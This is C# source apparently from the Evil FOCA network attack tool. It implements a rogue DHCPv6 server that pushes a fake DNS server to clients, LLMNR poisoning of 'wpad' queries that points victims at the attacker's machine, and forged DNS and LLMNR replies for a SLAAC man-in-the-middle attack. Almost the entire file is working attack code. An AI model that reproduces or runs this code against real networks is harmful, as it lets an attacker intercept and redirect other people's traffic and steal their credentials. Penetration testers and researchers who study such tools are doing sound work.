unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
return;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
return;
if (!(udp.ParentPacket is IPv6Packet))
return;
if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0)
return;
DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First();
IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket;
EthernetPacket ethernet = (EthernetPacket)p;
/*
Info: http://en.wikipedia.org/wiki/DHCPv6
Example
In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64.
DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547.
DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.)
DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
*/
DHCPv6Packet pa = new DHCPv6Packet();
pa.ParsePacket(udp.PayloadData);
if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2")))
{
EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress,
ethernet.SourceHwAddress,
EthernetPacketType.IpV6);
UdpPacket newUDP = null;
IPAddress ipv6LocalLink = null;
IPv6Packet newIpv6 = null;
switch (pa.MessageType)
{
case DHCPv6Type.Solicit:
if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA))
{
newUDP = new UdpPacket(547, 546);
byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value;
pa.MessageType = DHCPv6Type.Advertise;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
IpID++;
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
}
break;
case DHCPv6Type.Request:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.DNS);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
case DHCPv6Type.InformationRequest:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
default:
break;
}
}
}
public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && (llmnr.Query.Type.Value == LLMNR.DNSType.AAAA || llmnr.Query.Type.Value == LLMNR.DNSType.A))
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(dev);
byte[] ipv6Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV6);
IPv6Packet ipv6Dns = new IPv6Packet(ip, ((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv6Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A
&& (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00,0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xff,0xff,
(byte)ips[0].GetAddressBytes()[0],(byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2] ,(byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}